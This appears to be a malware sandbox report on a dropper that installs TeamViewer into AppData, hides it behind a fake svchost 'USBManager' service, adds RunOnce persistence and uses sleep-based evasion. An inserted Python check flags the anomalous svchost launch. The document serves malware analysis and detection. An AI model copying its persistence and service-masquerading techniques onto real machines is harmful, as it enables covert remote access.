Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown | Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown | Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004C6E36 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | File created: C:\Users\user\AppData\Roaming\TeamViewer
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | File created: C:\Users\user\AppData\Local\Temp\nso5B2E.tmp
Source: nso5B2F.tmp.1.dr | Binary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engine | Classification label: mal76.evad.winEXE@14/11@4/4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3329D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
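Two things in the evidence above go together. In the process list every legitimate service host is C:\Windows\System32\svchost.exe -k netsvcs -p (once with -s BITS), while one launch is c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager; and the rows just above (OpenSCManagerA, CreateServiceA, ChangeServiceConfig2A, then a run of RegCreateKeyExA/RegSetValueExA) are the code that registers that service and its group. The Python below is an editor-added triage check for svchost command lines, not code from the Joe Sandbox report or from the sample. The service-group allowlist and the accepted-switch set are assumptions and deliberately small; on an engagement the groups should be exported from HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost on a clean build of the same Windows release. A SysWOW64 service host is reported for review rather than as malicious outright, because 32-bit service hosts exist, but they do not normally carry a group nobody has heard of or an executable name as an argument.

```python
"""Triage svchost.exe launches taken from sandbox 'Process created' rows.

Editor-added check; not code from the Joe Sandbox report or the sample.
"""
import re
from typing import Dict, List, Set

# Partial allowlist of service-host groups: an assumption for this example.
# On an engagement, export HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
# from a clean build of the same Windows release and use that instead.
KNOWN_GROUPS: Set[str] = {
    "netsvcs", "localservice", "networkservice", "localsystemnetworkrestricted",
    "localservicenetworkrestricted", "localservicenonetwork", "dcomlaunch",
    "rpcss", "wsappx", "unistacksvcgroup",
}
# Switches seen on the legitimate launches in this report (assumption).
ALLOWED_SWITCHES: Set[str] = {"-k", "-p", "-s"}
SYSTEM32 = r"c:\windows\system32"

# Quoted tokens ('...' or "...") or bare non-space runs; the sandbox renders
# double quotes as single quotes, so both forms are accepted.
TOKEN_RE = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")
# In the flattened report the image path and the command line are separated
# by a single space; paths containing spaces would need the original cells.
PROC_RE = re.compile(r"Process created:\s*(?P<image>\S+)\s+(?P<cmd>.*\S)")


def tokenize(cmdline: str) -> List[str]:
    return [t.strip("'\"") for t in TOKEN_RE.findall(cmdline)]


def check_svchost_cmdline(cmdline: str, known_groups: Set[str] = KNOWN_GROUPS) -> List[str]:
    """Findings for an svchost.exe command line; [] if clean or not svchost at all."""
    toks = tokenize(cmdline)
    if not toks or not toks[0].lower().endswith("\\svchost.exe"):
        return []
    findings: List[str] = []
    image_dir = toks[0].lower().rsplit("\\", 1)[0]
    if image_dir != SYSTEM32:
        # SysWOW64 hosts exist for 32-bit services: 'review', not 'malicious'.
        findings.append(f"image not under System32: {image_dir}")
    i = 1
    while i < len(toks):
        tok, low = toks[i], toks[i].lower()
        if low.startswith("-"):
            if low not in ALLOWED_SWITCHES:
                findings.append(f"unexpected switch: {tok}")
            if low in ("-k", "-s") and i + 1 < len(toks):
                if low == "-k" and toks[i + 1].lower() not in known_groups:
                    findings.append(f"unknown service group: {toks[i + 1]}")
                i += 1  # consume the switch's argument
        elif low.endswith(".exe"):
            # svchost takes service and group names, never an executable to host
            findings.append(f"argument names an executable: {tok}")
        i += 1
    return findings


def triage_report(lines) -> Dict[str, List[str]]:
    """Map each flagged command line to its findings; clean launches are omitted."""
    flagged: Dict[str, List[str]] = {}
    for line in lines:
        m = PROC_RE.search(line)
        if not m:
            continue
        findings = check_svchost_cmdline(m.group("cmd"))
        if findings:
            flagged[m.group("cmd")] = findings
    return flagged


# Rows copied from the process list above.
SAMPLE_ROWS = [
    r"Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p",
    r"Source: unknown | Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager",
    r"Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS",
    r"Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f",
]

if __name__ == "__main__":
    for cmd, findings in triage_report(SAMPLE_ROWS).items():
        print(cmd)
        for finding in findings:
            print("   ", finding)
```

On the rows above only the SysWOW64 launch is reported, with four findings: the image directory, the unknown group, the -svcr switch, and teamviewer.exe passed as an argument. The same function applies unchanged to Sysmon event 1 or Security 4688 command lines; what the sandbox cannot show, and a live host can, is the parent, which for a genuine service host is services.exe.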
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,762AA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3396D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAADFBAAAA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F334E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | File created: C:\Program Files (x86)\QS
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | File written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 77Etc0bR2v.exe | Static file information: File size 1828192 > 1048576
Source: 77Etc0bR2v.exe | Static PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33C101 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0075C004 push ebp; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0053E60D push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0053BD8D push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0075BFE4 push ebp; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_6F33C101 push ecx; ret
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_6F33C101 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 11_2_026F4DB0 push esi; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02721B50 push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02725320 push ecx; iretd
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02721B50 push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_02725320 push ecx; iretd
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 12_3_026F703A push ecx; ret
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | File created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | File created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | File created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560 | Thread sleep count: 269 > 30
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560 | Thread sleep time: -134500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5264 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5720 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\77Etc0bR2v.exe | Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | Code function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
